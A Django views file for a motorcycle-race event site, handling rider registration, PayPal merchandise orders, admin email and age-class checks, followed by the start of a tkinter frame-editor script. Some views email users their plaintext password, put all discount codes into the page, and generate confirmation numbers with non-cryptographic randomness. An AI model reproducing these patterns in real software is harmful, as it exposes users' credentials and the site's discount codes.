RegistrationForm,\n EditProfileForm,\n RiderProfileFormSet,\n MerchandiseOrderForm,\n RegistrationCheck,\n LobosRace\n)\nfrom django.db.models import F\nfrom django.forms.utils import ErrorDict, ErrorList\nfrom django.template import loader\nfrom django.template import Context\nfrom anymail.message import attach_inline_image_file\nfrom django.template.loader import render_to_string\nimport random\nimport string\nimport json\nimport re\nimport math\nfrom datetime import datetime as ddt\nimport datetime as dt\n\n\ndef clubeventsCheckout(request):\n return render(request, 'events/clubeventsCheckout.html')\n\n\ndef change_names_to_lower():\n all_names = RiderProfile.objects.all()\n for name in all_names:\n name.first_name = name.first_name.lower()\n name.last_name = name.last_name.lower()\n try:\n name.email = name.email.lower()\n name.email2 = name.email2.lower()\n except:\n print('no email')\n try:\n name.confirmation_number = name.confirmation_number.upper()\n except:\n print('no email')\n name.save()\n\n\n@staff_member_required\ndef clubevents(request):\n if request.POST:\n form = LobosRace(request.POST)\n if form.is_valid():\n data = {\n 'name': form.cleaned_data['name'],\n 'event': 'Devils Head',\n }\n f = form.save()\n return render(request, 'events/clubeventsCheckout.html', {'data': data})\n else:\n errors = form.errors\n return render(request, 'events/clubevents.html', {'form': form, 'errors': errors})\n else:\n form = LobosRace()\n signed_up = len(ClubEvent.objects.all())\n return render(request, 'events/clubevents.html', {'form': form, 'signed_up': signed_up})\n\n\ndef registration_check(request):\n if request.POST:\n form = RegistrationCheck(request.POST)\n\n if form.is_valid():\n f = form.cleaned_data\n confirmation_number = f['confirmationNumber'].upper()\n first_name = f['first_name'].lower()\n last_name = f['last_name'].lower()\n\n if confirmation_number == '' and first_name == '' and last_name == '':\n form = RegistrationCheck()\n\n args = {\n 'result': False,\n 'name': '',\n 'event': 'Please provide first and last name or a confirmation number'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n if confirmation_number:\n try:\n event_id = RiderProfile.objects.filter(\n confirmation_number=confirmation_number).values_list('event_id', flat=True)\n\n confirmation_names = RiderProfile.objects.filter(\n confirmation_number=confirmation_number).values_list('first_name', 'last_name')\n\n if event_id is not None:\n confirmation_names = list(confirmation_names)\n first_and_last_names = list((' '.join(name).title() for name in confirmation_names))\n first_and_last_names_format = []\n for name in first_and_last_names:\n if name == first_and_last_names[-1]:\n first_and_last_names_format.append('and ' + name)\n else:\n first_and_last_names_format.append(name + ', ')\n event_name = Event.objects.filter(id=event_id[0]).values_list('event_name', flat=True)\n event_date = Event.objects.filter(id=event_id[0]).values_list('event_date', flat=True)\n event_data = event_name[0] + ' scheduled for ' + event_date[0].strftime('%m/%d/%Y')\n args = {\n 'result': True,\n 'name': first_and_last_names_format,\n 'event': 'registered for ' + event_data + '.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n except:\n args = {\n 'result': False,\n 'name': '',\n 'event': 'That confirmation number was not found.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n elif first_name != '' and last_name != '':\n event_id = RiderProfile.objects.filter(first_name__iexact=first_name).filter(\n last_name__iexact=last_name).values_list(\n 'event', flat=True).last()\n if event_id is not None:\n first_and_last_names = [first_name.capitalize() + \" \" + last_name.capitalize()]\n event_name = Event.objects.filter(id=event_id).values_list('event_name', flat=True)\n event_date = Event.objects.filter(id=event_id).values_list('event_date', flat=True)\n event_data = event_name[0] + ' scheduled for ' + event_date[0].strftime('%m/%d/%Y')\n\n args = {\n 'result': True,\n 'name': first_and_last_names,\n 'event': 'registered for ' + event_data + '.'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n else:\n name = [first_name.capitalize() + ' ' + last_name.capitalize()]\n args = {\n 'result': True,\n 'name': name,\n 'event': 'not registered for an event.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n else:\n form = RegistrationCheck()\n\n args = {\n 'result': False,\n 'name': '',\n 'event': 'Please enter a first and last name.'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n else:\n errors = {\n 'errors': form.errors\n }\n return render(request, 'events/registration_check.html', {'form': form, 'errors': errors})\n\n else:\n form = RegistrationCheck()\n return render(request, 'events/registration_check.html', {'form': form})\n\n\ndef merchCheckout(request):\n return render(request, 'events/merchCheckout.html')\n\n\ndef contact(request):\n return render(request, 'events/contact.html')\n\n\ndef merchandise(request):\n merchValues = Merchandise.objects.filter(available_on_merch_page=True).values()\n count = 1\n merch = {}\n for dict in merchValues:\n itemInfo = {}\n sizeQty = {}\n itemName = \"item_\" + str(count)\n for attr, value in dict.items():\n if 'quantity_available' in attr:\n sizeQty[attr] = value\n else:\n itemInfo[attr] = value\n count += 1\n merch[itemName] = [itemInfo, sizeQty]\n\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n form = MerchandiseOrderForm(request.POST)\n\n if form.is_valid():\n postData = request.POST.dict()\n # save the data to the database\n # try:\n itemsOrderedDict = json.loads(postData['items_ordered'])\n item_ordered = itemsOrderedDict['transactions'][0]['item_list']['items']\n all_items = ''\n paypal_order_id = itemsOrderedDict['transactions'][0]['related_resources'][0]['sale']['id']\n\n if MerchandiseOrder.objects.filter(paypal_order_id=paypal_order_id).exists():\n args = {\n \"thing_key\": paypal_order_id,\n }\n return render(request, 'events/merchCheckout.html', {\"args\": args})\n else:\n MerchandiseOrder.objects.create(\n first_name=postData['first_name'],\n last_name=postData['last_name'],\n address=postData['address'],\n city=postData['city'],\n state=postData['state'],\n zip_code=postData['zip_code'],\n email=postData['email'],\n date_ordered=itemsOrderedDict['create_time'],\n paypal_order_id=paypal_order_id,\n items_ordered=all_items)\n\n for item in item_ordered:\n for key in item:\n if key == 'name':\n all_items += 'Item: ' + str(item[key]) + ' - '\n if key == 'quantity':\n quantity = item[key]\n all_items += 'Quantity: ' + str(quantity) + '\\n'\n if key == 'sku':\n quantity = item['quantity']\n split_sku = item[key].split(' ')\n pk = split_sku[0]\n product = Merchandise.objects.get(pk=pk)\n current_quantity = getattr(product, split_sku[1])\n setattr(product, split_sku[1], current_quantity - quantity)\n product.save()\n\n args = {\n \"thing_key\": paypal_order_id,\n }\n return render(request, 'events/merchCheckout.html', {\"args\": args})\n\n else:\n args = {\n \"merch\": merch,\n }\n json_args = json.dumps(args)\n\n return render(request, \"events/merchandise.html\", {\"args\": args, \"json_args\": json_args, \"form\": form})\n\n else:\n form = MerchandiseOrderForm()\n args = {\n \"merch\": merch,\n }\n json_args = json.dumps(args)\n\n return render(request, \"events/merchandise.html\", {\"args\": args, \"json_args\": json_args, \"form\": form})\n\n\n@staff_member_required\ndef adminemail(request):\n events = list(Event.objects.all())\n allEmails = list(User.objects.values_list(\"email\", flat=True))\n args = {'allEmails': allEmails, 'events': events}\n if request.method == 'POST':\n data = request.POST\n subject = request.POST.get(\"subject\")\n header = request.POST.get(\"header\")\n subheader = request.POST.get(\"subheader\")\n emailmessage = request.POST.get(\"message\").replace('\\n', '
    ')\n recipients = request.POST.get(\"recipients\")\n\n if recipients == 'All Persons in the Database':\n recipients = allEmails\n elif \"@\" not in recipients:\n # getting the emails for the selected event\n event_name = recipients[:-5]\n event_year = recipients[-4:]\n # Event.objects.filter(event_name=event_name).filter(event_date__contains=event_year):\n # print('in the for loop')\n recipients = list(\n Event.objects.filter(event_name=event_name).filter(event_date__contains=event_year).values_list(\n 'riderprofile__email', flat=True))\n else:\n recipients = [recipients]\n print(recipients)\n args = {'allEmails': allEmails, 'events': events,\n \"success\": \"

    Your email was successfully sent!

    \"}\n\n general_email(subject, header, subheader, emailmessage, recipients)\n\n return render(request, 'events/adminemail.html', args)\n else:\n events = list(Event.objects.all())\n allEmails = list(RiderProfile.objects.values_list(\"email\", flat=True))\n args = {'allEmails': allEmails, 'events': events}\n return render(request, 'events/adminemail.html', args)\n\n\ndef general_email(subject, header, subheader, emailmessage, recipients):\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=\"The Lobos Team \",\n to=recipients,\n reply_to=[\"Lobos Support \"],\n )\n msg.merge_data = {}\n msg.merge_global_data = {}\n\n html = loader.render_to_string(\n '../templates/events/generalemail.html',\n {\n 'header': header,\n 'subheader': subheader,\n 'message': emailmessage,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"general communication\"]\n msg.track_clicks = True\n # Send it:\n msg.send()\n\n\ndef home(request):\n events = Event.objects.all().order_by('-event_date')[0:2]\n event_name = events.values_list('event_name', flat=True)\n event_dates = events.values_list('event_date', flat=True)\n year_list = []\n event_date = []\n event_details = []\n event_location = []\n map_location = []\n description = []\n pre_entry_cost = []\n post_entry_cost = []\n escort_rider_cost = []\n entry_closes = []\n rider_limit = []\n reg_riders = []\n remaining_spots = []\n remaining_time = []\n open_registration = []\n promotion = []\n promotion_description = []\n promotion_count = []\n\n for event in event_name:\n event_id = Event.objects.get(event_name=event).id\n reg_riders.append(RiderProfile.objects.filter(event=event_id).count())\n\n for date in event_dates:\n tte = int((date - dt.date.today()).days)\n\n try:\n if tte == 0:\n remaining_time.append(\"It's Today!!!\")\n elif tte < 1:\n remaining_time.append(\"Results to Come!\")\n else:\n remaining_time.append(tte)\n except:\n remaining_time.append(\"TBD\")\n\n for date in event_dates:\n year = str(date)[:4]\n year_list.append(year)\n\n for event in events:\n\n event_date.append(event.event_date)\n event_details.append(event.event_details)\n event_location.append(event.event_location)\n map_location.append(event.map_location)\n description.append(event.description)\n pre_entry_cost.append(event.pre_entry_cost)\n post_entry_cost.append(event.post_entry_cost)\n entry_closes.append(event.entry_closes)\n escort_rider_cost.append(event.escort_rider_cost)\n rider_limit.append(event.rider_limit)\n open_registration.append(event.open_registration)\n promotion.append(event.promotion)\n if event.promotion is not None:\n # total not to exceed\n promo_limit = \\\n SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_limit', flat=True)[0]\n promo_count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name))\n event.promotion.promotion_limit = promo_limit - promo_count\n\n promotion_count.append(event.promotion.promotion_limit)\n promotion_description.append(event.promotion.promotion_description)\n else:\n promotion_count.append(0)\n promotion_description.append(0)\n\n for limit, rider in zip(rider_limit, reg_riders):\n try:\n remaining_spots.append(limit - rider)\n except:\n remaining_spots.append('TBD')\n\n events_details = zip(event_name, # 0\n year_list, # 1\n event_date, # 2\n event_details, # 3\n event_location, # 4\n map_location, # 5\n description, # 6\n pre_entry_cost, # 7\n post_entry_cost, # 8\n entry_closes, # 9\n escort_rider_cost, # 10\n remaining_spots, # 11\n remaining_time, # 12\n open_registration, # 13\n promotion, # 14\n promotion_count, # 15\n promotion_description, # 16\n )\n\n context = {'events_details': events_details}\n\n return render(request, 'events/home.html', context)\n\n\ndef login(request):\n return render(request, 'events/login.html')\n\n\n# Email\ndef send_mail_user_reg(email, first_name, last_name, username, password):\n msg = EmailMultiAlternatives(\n subject=\"Welcome to Lobos\",\n from_email=\"The Lobos Team \",\n to=[email],\n reply_to=[\"Lobos Support \"])\n\n html = loader.render_to_string(\n '../templates/events/userregistertemplate.html',\n {\n 'name': first_name.title() + \" \" + last_name.title(),\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title,\n 'password': password,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"activation\", \"onboarding\"]\n msg.track_clicks = True\n\n # Send it:\n msg.send()\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n email = request.POST['email'].replace(\" \", \"\")\n first_name = request.POST['first_name'].replace(\" \", \"\")\n last_name = request.POST['last_name'].replace(\" \", \"\")\n username = first_name.lower() + last_name.lower() + \\\n email.lower().replace(\" \", \"\")\n password = request.POST['password1']\n\n if User.objects.filter(username=username).exists():\n user_id = User.objects.get(username=username).id\n args = {'form': form,\n 'uniqueNameErrors': '

    A user with this first and last name and email already exists. '\n 'Reset your password here.

    '}\n return render(request, 'events/reg_form.html', args)\n\n else:\n form.save()\n send_mail_user_reg(email, first_name, last_name, username, password)\n return redirect('/login/')\n\n else:\n args = {'form': form, 'errors': form.errors}\n return render(request, 'events/reg_form.html', args)\n\n else:\n form = RegistrationForm()\n args = {'form': form}\n return render(request, 'events/reg_form.html', args)\n\n\ndef profile(request):\n args = {'user': request.user}\n return render(request, 'events/profile.html', args)\n\n\ndef edit_profile(request):\n if request.method == 'POST':\n form = EditProfileForm(request.POST, instance=request.user)\n\n if form.is_valid():\n form.save()\n return redirect('/profile')\n else:\n form = EditProfileForm(instance=request.user)\n args = {\n 'form': form, 'errors': 'A user with that username already exists. Please choose a different one.'}\n return render(request, 'events/edit_profile.html', args)\n else:\n form = EditProfileForm(instance=request.user.profile)\n args = {'form': form}\n return render(request, 'events/edit_profile.html', args)\n\n\ndef change_password(request):\n if request.method == 'POST':\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n update_session_auth_hash(request, form.user)\n subject = 'LobosEvents.com Password Change'\n from_email = 'MrWolf@LobosEvents.com'\n to = request.user.email\n first_name = request.user.first_name\n username = request.user.username\n\n text_content = 'Hi ' + first_name.title() + \\\n '\\nYou recently requested to reset your password at LobosEvents.com. \\n' \\\n 'Your username, in case you\\'ve forgotten: ' + username\n\n html_content = 'Hi ' + first_name.title() + \\\n '\\nYou recently requested to reset your password at LobosEvents.com. \\n' \\\n 'Your username, in case you\\'ve forgotten: ' + username\n\n msg = EmailMultiAlternatives(\n subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n return redirect('/profile/')\n else:\n # changed this from formset.errors to form.errors\n # errors = {'errors': formset.errors}\n errors = {'errors': form.errors}\n return redirect('change_password', errors)\n else:\n form = PasswordChangeForm(user=request.user)\n args = {'form': form}\n return render(request, 'events/password_change.html', args)\n\n\ndef error_checking(request):\n under_16 = 0\n escorts_signed_up = 0\n over_16 = False\n forms = json.load(request) # The form as html string\n event_date = forms[\"event_date\"].replace(\",\", \"\")\n event_date = ddt.strptime(event_date, '%B %d %Y')\n event_date = ddt.date(event_date)\n form_count = 0\n formset = RiderProfileFormSet(forms)\n\n if formset.is_valid():\n # calc age\n for form in formset:\n form_count += 1\n y = 0\n m = 0\n d = 0\n age_error = False\n email1 = form.cleaned_data['email']\n email2 = form.cleaned_data['email2']\n birth_date = form.cleaned_data['birth_date']\n rider_class = form.cleaned_data['rider_class']\n\n gender = form.cleaned_data['gender']\n y = event_date.year - birth_date.year\n m = event_date.month - birth_date.month\n d = event_date.day - birth_date.day\n\n # under 16 rider classes\n\n class_list_under_16 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\"]\n class_list_under_30 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\",\n \"Expert 16 and over 30 EX\", \"Expert 16 and over 40 EX-EX\",\n \"Amateur 16 and over 30 AM\", \"Amateur 16 and over 40 EX-AM\",\n \"Amateur 16 and over 40 AM\", \"Amateur 16 and over 50 AM\",\n \"Amateur 16 and over 50 EX\", \"60 Class\",\n \"70 Class\"]\n class_list_under_40 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"Expert 16 and over 40 EX-EX\",\n \"Amateur 16 and over 40 EX-AM\", \"Amateur 16 and over 40 AM\",\n \"Amateur 16 and over 50 AM\", \"Amateur 16 and over 50 EX\", \"60 Class\",\n \"70 Class\"]\n class_list_under_50 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"Amateur 16 and over 50 AM\", \"Amateur 16 and over 50 EX\",\n \"60 Class\",\n \"70 Class\"]\n class_list_under_60 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"60 Class\", \"70 Class\"]\n class_list_under_70 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"70 Class\"]\n\n rider_class_check = False\n age_set = [30, 40, 50, 60, 70]\n content = {}\n if email1 != email2:\n content['email_not_the_same'] = True\n content[\"email_not_the_same_form\"] = form_count\n\n if y > 150:\n content['birthdate_wrong'] = True\n content[\"birthdate_form\"] = form_count\n # return JsonResponse(content)\n\n if (y < 16) or (y == 16 and m < 0) or (y == 16 and m == 0 and d < 0):\n under_16 += 1\n if rider_class not in class_list_under_16:\n content['under_class_age'] = {\n \"rider_class\": rider_class, 'form': form_count}\n content[\"age_error\"] = True\n else:\n pass\n else:\n over_16 = True\n\n if rider_class == \"Escort Rider\" and over_16 == True:\n escorts_signed_up += 1\n\n if (under_16 - escorts_signed_up > 0):\n error = 'escorts' if (\n under_16 - escorts_signed_up > 1) else 'escort'\n content['escorts_signed_up'] = escorts_signed_up\n content['under_16'] = under_16\n\n for age in age_set:\n if (y < age and y >= 16) or (y == age and m < 0) or (y == age and m == 0 and d < 0):\n if (age == 30 and rider_class in class_list_under_30) or \\\n (age == 40 and rider_class in class_list_under_40) or \\\n (age == 50 and rider_class in class_list_under_50) or \\\n (age == 60 and rider_class in class_list_under_60) or \\\n (age == 70 and rider_class in class_list_under_70):\n content['under_class_age'] = {\n \"age\": age, \"rider_class\": rider_class, 'form': form_count}\n content[\"age_error\"] = True\n # return JsonResponse(content)\n\n if gender == 'Male' and (rider_class == 'Amateur under 16 Women' or rider_class == \"Amateur 16 and over Women\"):\n content['gender_class'] = True\n content['gender_form'] = form_count\n # return JsonResponse(content)\n if content != {}:\n return JsonResponse(content)\n\n else:\n content = {'success': True}\n return JsonResponse(content)\n\n else:\n content = {'errors': formset.errors, 'success': False, 'escorts_signed_up': escorts_signed_up,\n 'under_16': under_16, }\n return JsonResponse(content)\n\n\ndef event_mail(email, first_name, last_name, username, rider_class, event, confirmation_number):\n msg = EmailMultiAlternatives(\n subject=\"You're Registered!\",\n from_email=\"The Lobos Team \",\n to=[email],\n reply_to=[\"Lobos Support \"])\n\n html = loader.render_to_string(\n '../templates/events/eventregistertemplate.html',\n {\n 'event': event,\n 'rider_class': rider_class,\n 'name': first_name.title() + \" \" + last_name.title(),\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title,\n 'confirmation_number': confirmation_number,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"event_registration\"]\n msg.track_clicks = True\n\n # Send it:\n msg.send()\n\n\ndef event_register(request):\n if request.method == 'POST':\n formset_post = RiderProfileFormSet(request.POST)\n\n if formset_post.is_valid():\n formset = formset_post.save(commit=False)\n postData = request.POST.dict()\n try:\n itemsOrderedDict = json.loads(postData['form-0-items_ordered'])\n except:\n itemsOrderedDict = 'Free Race Entry Using Discount Code'\n try:\n confirmation_number = itemsOrderedDict['transactions'][0]['related_resources'][0]['sale']['id']\n except:\n confirmation_number = 'DISC' + id_generator()\n confirmation_number = confirmation_number.upper()\n\n if RiderProfile.objects.filter(confirmation_number=confirmation_number).exists():\n args = {\n \"confirmation_number\": confirmation_number,\n }\n return render(request, 'events/event_resubmited.html', {\"args\": args})\n\n count = 0\n confirm = {}\n for form in formset:\n count += 1\n created_username = form.first_name + form.last_name + form.email\n created_username = created_username.replace(\" \", \"\").lower()\n form.confirmation_number = confirmation_number\n form.event = Event.objects.get(\n event_name=request.GET.get('event'))\n event = str(form.event)\n\n if form.discount_code != None:\n usedCode = form.discount_code\n # Codes.objects.filter(discount_code=usedCode).delete()\n\n if User.objects.filter(username=created_username).exists():\n user_id = User.objects.get(username=created_username).id\n\n if not User.objects.filter(username=created_username).exists():\n user = User.objects.create(username=created_username,\n email=form.email,\n first_name=form.first_name,\n last_name=form.last_name, )\n\n user.first_name = form.first_name.lower()\n user.last_name = form.last_name.lower()\n user.save()\n form.user = user\n user = Profile.objects.filter(user=user)\n user.update(address=form.address)\n user.update(gender=form.gender)\n user.update(birth_date=form.birth_date)\n user.update(phone_number=form.phone_number)\n user.update(country=form.country)\n user.update(address_line_two=form.address_line_two)\n user.update(city=form.city)\n user.update(state=form.state)\n user.update(zip_code=form.zip_code)\n user.update(\n emergency_contact_name=form.emergency_contact_name)\n user.update(\n emergency_contact_phone=form.emergency_contact_phone)\n\n message = ''\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email.lower()\n rider_class = form.rider_class\n\n confirm[created_username] = {'message': message,\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. Email not sent to \" + email)\n\n elif RiderProfile.objects.filter(event=form.event).filter(user=user_id).exists():\n form.user = User.objects.get(username=created_username)\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email\n rider_class = form.rider_class\n\n # if we want to send the old confirmation number, uncomment below code\n # confirmation = RiderProfile.objects.get(event=form.event, user=user_id).confirmation_number\n\n message = 'The rider, ' + first_name + ' ' + last_name + ', has previously been registered.' + \\\n ' Please contact the person you registered to verify.' \\\n ' If they have been registered twice please contact us for a refund for that entry.' \\\n ' Email us at info@lobosmc.com'\n\n confirm[created_username] = {'message': message,\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. Email not sent to \" + email)\n\n else:\n form.user = User.objects.get(username=created_username)\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email.lower()\n rider_class = form.rider_class\n\n confirm[created_username] = {'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. Email not sent to \" + email)\n\n args = {'event': form.event, 'confirm': confirm}\n # email confirmation function here\n return render(request, 'events/event_confirmation.html', args)\n else:\n errors = formset_post.errors\n event = Event.objects.get(event_name=request.GET.get('event'))\n formset = prefill_form(request)\n codes = dict(Codes.objects.values_list(\n 'discount_code', 'discount_amount'))\n codes = dict((key.lower(), value) for key, value in codes.items())\n codes = json.dumps(codes)\n print(codes)\n\n if event.promotion:\n event.promotion.promotion_options = promotion_func(event)\n promotion = event.promotion\n\n args = {'formset': formset, 'event': event, 'errors': errors, 'codes': codes, 'promotion': promotion}\n return render(request, 'events/event_register.html', args)\n\n else:\n # formset = prefill_form(request)\n event = Event.objects.get(event_name=request.GET.get('event'))\n rider_limit = event.rider_limit\n registered_riders = len(RiderProfile.objects.filter(event=event))\n\n if rider_limit - registered_riders <= 0:\n args = {'event': event}\n return render(request, 'events/sold_out.html', args)\n\n if not event.open_registration:\n args = {'event': event}\n return render(request, 'events/unavailable_event.html', args)\n\n codes = dict(Codes.objects.values_list(\n 'discount_code', 'discount_amount'))\n codes = dict((key.lower(), value) for key, value in codes.items())\n codes = json.dumps(codes)\n print(codes)\n\n promotion = event.promotion\n\n if event.promotion:\n event.promotion.promotion_options = promotion_func(event)\n if event.promotion.promotion_options is None:\n promotion = None\n\n args = {'event': event, 'codes': codes, 'promotion': promotion}\n # args = {'formset': formset, 'event': event, 'codes': codes}\n return render(request, 'events/event_register.html', args)\n\n\ndef event_confirmation(request):\n args = {'request': request, 'user': request.user}\n return render(request, 'events/event_confirmation.html', args)\n\n\ndef id_generator(size=9, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef event_formset(request):\n formset = prefill_form(request)\n formset = str(formset)\n event = json.loads(request.body)['event']\n promotion = json.loads(request.body)['promotion']\n event_date = json.loads(request.body)['event'][-4:]\n # escort_rider_cost = Event.objects.get(\n # event_name=event, event_date__contains=event_date).escort_rider_cost\n # reg_rider_cost = Event.objects.get(\n # event_name=event, event_date__contains=event_date).pre_entry_cost\n # reg_rider_cost = Event.objects.get(event_name=request.GET.get('event')).pre_entry_cost\n # formset_to_vue = {'reg_rider_cost': reg_rider_cost,\n # 'escort_rider_cost': escort_rider_cost, 'formset': formset}\n formset = re.sub('for=\"id_form-0-promotional_item\"',\n 'for=\"id_form-0-promotional_item\" id=\"id_form-0-promotional_item_label\" class=\"hide\"', formset)\n\n formset = re.sub('for=\"id_form-0-promotion_options\"',\n 'for=\"id_form-0-promotion_options\" id=\"id_form-0-promotion_options_label\" class=\"hide\"', formset)\n\n formset = re.sub('for=\"id_form-0-promotion_options\"',\n 'for=\"id_form-0-promotion_options\" id=\"id_form-0-promotion_options_label\" class=\"hide\"', formset)\n\n formset_to_vue = {'formset': formset}\n\n return JsonResponse(formset_to_vue)\n\n\ndef prefill_form(request):\n # form_fill_dict = {}\n # profile_field_names = []\n # prof = request.user.profile\n\n # for field in Profile._meta.get_fields():\n # if field.name is not 'id':\n # profile_field_names.append(field.name)\n # field = str(field.name)\n # form_fill_dict[field] = getattr(prof, field)\n\n # user_field_names = ['first_name', 'last_name', 'email']\n # user_prof = request.user\n # for field in User._meta.get_fields():\n # field = str(field.name)\n # if field in user_field_names:\n # form_fill_dict[field] = getattr(user_prof, field)\n # return RiderProfileFormSet(queryset=RiderProfile.objects.none(), initial=[form_fill_dict])\n return RiderProfileFormSet(queryset=RiderProfile.objects.none())\n\n\ndef promotion_func(event):\n # total not to exceed\n promo_limit = SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_limit', flat=True)[0]\n promo_count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name))\n\n # if the limit is reached\n if promo_count >= promo_limit:\n return None\n\n # string options to add to list\n options_string = \\\n SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_options', flat=True)[0]\n\n # how many options in the promotion\n options_count = len(options_string.split(','))\n\n # listing the options\n options_list = options_string.split(',')\n\n # total per option\n limit_per_option = math.floor(promo_limit / options_count)\n\n # options taken count\n rider_promo_option_count = []\n for option in options_list:\n count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name).filter(\n promotion_options=option))\n rider_promo_option_count.append({option: count})\n\n promo_otions_available = []\n # options to add to list\n for promo_time in rider_promo_option_count:\n for key, value in promo_time.items():\n if value < limit_per_option:\n promo_otions_available.append(key)\n\n str_promo_options = ','.join(promo_otions_available)\n\n return str_promo_options\n","repo_name":"unitedideas/lobos","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":43093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27567433696","text":"import sys\nimport tkinter as tk\nfrom typing import List\nfrom src.load import config\nfrom src.FileManager import FileManager\nfrom src.StateManager import StateManager\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n fm = FileManager(filename, config['rows'], config['columns'])\n fm.read()\n if (fm.is_data_corrupt()):\n decision = input('data file is corrupt, fix it automatically? (y/n): ')\n if (decision == 'y' or decision == 'Y'):\n fm.fix_data()\n else:\n sys.exit()\n fm.write()\n\n app = tk.Tk()\n sm = StateManager(fm.data, fm.rows, fm.columns, config['pixel_on_hex_color'], config['pixel_off_hex_color'])\n\n header_section0 = tk.Frame(app)\n tk.Button(header_section0, text='Save', command=fm.write, highlightbackground=config['save_button_color']).pack()\n header_section0.pack()\n\n header_section1 = tk.Frame(app)\n tk.Button(header_section1, text='Remove Current Frame', command=sm.on_remove_frame, highlightbackground=config['remove_current_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section1, text='Clear Current Frame', command=sm.on_clear_frame, highlightbackground=config['clear_current_frame_color']).pack(side=tk.RIGHT)\n header_section1.pack()\n\n header_section2 = tk.Frame(app)\n tk.Button(header_section2, text='<< Add Empty Frame', command=sm.on_add_empty_frame_before, highlightbackground=config['add_empty_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section2, text='Add Empty Frame >>', command=sm.on_add_empty_frame_after, highlightbackground=config['add_empty_frame_color']).pack(side=tk.RIGHT)\n header_section2.pack()\n\n header_section3 = tk.Frame(app)\n tk.Button(header_section3, text='<< Add Copy Of Current Frame', command=sm.on_duplicate_frame_before, highlightbackground=config['add_duplicate_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section3, text='Add Copy Of Current Frame >>', command=sm.on_duplicate_frame_after, 